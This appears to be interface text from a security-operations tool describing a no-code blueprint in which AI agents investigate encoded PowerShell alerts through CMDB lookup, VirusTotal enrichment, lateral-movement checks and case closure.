Instructions
This blueprint investigates encoded PowerShell alerts. Collect context, identify affected users and hosts, analyze suspicious activity
Preferences
Clear, guided workflow with essential context. Reasonable defaults for time and credit limits, automatic enrichment where possible.
Collect Alert information from Triage Agent and search users or machines in the CMDB with Axonius for context
Enrich the alert details with relevant information from VirusTotal
Check for Suspicious Execution
Search for signs of lateral movement or infection spread using the Investigation Agent with VirusTotal and MITRE ATT&CK...
Document the investigation and close the case
Prompt next step in natural language
Prompt next step in natural language
Prompt next step in natural language
Prompt next step in natural language
Drag & drop components to build AI-powered investigation workflows — no code needed.